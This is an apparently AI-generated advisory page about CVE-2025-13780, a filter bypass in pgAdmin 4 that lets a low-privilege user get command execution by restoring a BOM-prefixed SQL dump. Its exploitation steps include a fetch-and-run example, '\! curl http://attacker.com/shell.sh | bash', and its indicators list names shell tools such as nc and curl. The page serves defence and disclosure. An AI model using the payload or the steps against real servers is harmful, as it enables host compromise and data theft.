CVE-2025-13780: 
Python vulnerability analysis and mitigation

Overview

CVE-2025-13780 is a Remote Code Execution (RCE) vulnerability in pgAdmin 4 (versions up to and including 9.10) that allows authenticated low-privilege attackers to inject and execute arbitrary commands on the server hosting pgAdmin when it is running in server mode and performing restores from PLAIN-format dump files. The vulnerability was reported on November 18, 2025, and publicly disclosed on December 11, 2025, with a patch released in pgAdmin 4 version 9.11 (GitHub Advisory, Red Hat Bugzilla). It carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory Database, and 8.8 (High) per the NVD (GitHub Advisory).

Technical details

CVE-2025-13780 is a bypass of the meta-command filter introduced to remediate the prior vulnerability CVE-2025-12762. The has_meta_commands() function in pgAdmin uses a regular expression to scan raw bytes for dangerous psql meta-commands (e.g., \!) in PLAIN-format SQL dump files before passing them to psql --file. However, the regex fails to account for files beginning with a UTF-8 Byte Order Mark (BOM: EF BB BF) or other special byte sequences — psql silently strips these bytes and then executes the embedded meta-command, resulting in OS command execution (GitHub Advisory, pgAdmin Issue #9368). The vulnerability is classified as CWE-88 (Argument Injection) and CWE-94 (Code Injection), and requires only low-privilege network access with no user interaction (GitHub Advisory). A technical write-up detailing the bypass mechanism was published by Endor Labs (Endor Labs).

Impact

Successful exploitation allows a low-privilege authenticated attacker to execute arbitrary OS commands on the server hosting pgAdmin, resulting in full compromise of confidentiality, integrity, and availability of the affected system (Red Hat Bugzilla). An attacker could exfiltrate sensitive database contents, modify or destroy data, install backdoors or malware, and use the compromised server as a pivot point for lateral movement within the network (GitHub Advisory). The scope is marked as Changed in the GitHub Advisory scoring, reflecting that the impact extends beyond the pgAdmin application itself to the underlying host operating system.

Exploitability

Multiple public proof-of-concept (PoC) exploits are available on GitHub, including repositories by zeropwn, meenakshisl, ThemeHackers, and Ashwesker, published as early as December 2025 (PoC - zeropwn, PoC - meenakshisl, PoC - ThemeHackers). As of the available intelligence, there is no confirmed evidence of in-the-wild exploitation or known threat actor attribution, though the availability of public PoCs significantly lowers the barrier to exploitation. The EPSS score is approximately 0.086–0.121%, and the vulnerability does not appear in the CISA KEV catalog at this time (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing pgAdmin 4 instances running in server mode with versions ≤ 9.10 using tools like Shodan or Censys, or by accessing the pgAdmin login page and checking version information.
  2. Obtain low-privilege credentials: Authenticate to the pgAdmin server using any valid low-privilege account (e.g., a standard pgAdmin user account).
  3. Craft a malicious PLAIN-format SQL dump file: Create a SQL file that begins with a UTF-8 Byte Order Mark (EF BB BF) followed by a psql meta-command such as \! <OS_COMMAND> (e.g., \! curl http://attacker.com/shell.sh | bash). The BOM causes the has_meta_commands() regex filter to miss the meta-command.
  4. Initiate a restore operation: In the pgAdmin web interface, navigate to the restore functionality for a target database and upload or specify the crafted PLAIN-format SQL dump file as the restore source.
  5. Achieve command execution: When pgAdmin invokes psql --file with the crafted file, psql strips the BOM and executes the embedded \! meta-command, running the attacker-controlled OS command as the pgAdmin server process user (GitHub Advisory, Endor Labs).

Indicators of compromise

  • Network: Unexpected outbound connections from the pgAdmin server to external IPs or domains (e.g., reverse shell callbacks, file download requests via curl/wget) following a restore operation.
  • Logs: pgAdmin application logs showing restore operations initiated with PLAIN-format SQL files, especially from low-privilege accounts; psql process invocations with --file arguments pointing to unusual or temporary file paths.
  • File System: Presence of SQL dump files beginning with the UTF-8 BOM bytes (EF BB BF) in pgAdmin upload or temporary directories; unexpected scripts, web shells, or binaries created in directories writable by the pgAdmin process user.
  • Process: Unusual child processes spawned by the pgAdmin or psql process (e.g., /bin/sh, bash, curl, wget, python, nc) that are not part of normal database operations.
  • Authentication: Low-privilege pgAdmin accounts initiating restore operations against databases they do not normally manage, particularly outside of business hours.

Mitigation and workarounds

The vulnerability is patched in pgAdmin 4 version 9.11, which corrects the has_meta_commands() filter to properly handle files with UTF-8 BOM and other special byte sequences (GitHub Advisory). All users running pgAdmin 4 in server mode should upgrade to version 9.11 or later immediately. As interim mitigations, restrict network access to the pgAdmin server to trusted networks only, limit which users have permission to perform restore operations, and monitor server logs for suspicious restore activity involving PLAIN-format dump files (Red Hat Bugzilla).

Community reactions

The vulnerability received notable coverage from security news outlets including GBHackers, CyberSecurityNews, SecurityOnline, and The Hacker News (in their weekly recap), highlighting the bypass of a prior fix as particularly concerning (GBHackers, SecurityOnline). Endor Labs published a detailed technical blog post explaining how the regex-based filter was insufficient and how the BOM bypass was discovered, crediting researchers zeropwn and Cycloctane (Endor Labs). The CVE appeared in multiple weekly trending CVE lists on Reddit's r/CVEWatch and was included in CISA's weekly vulnerability bulletin, reflecting broad community awareness.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management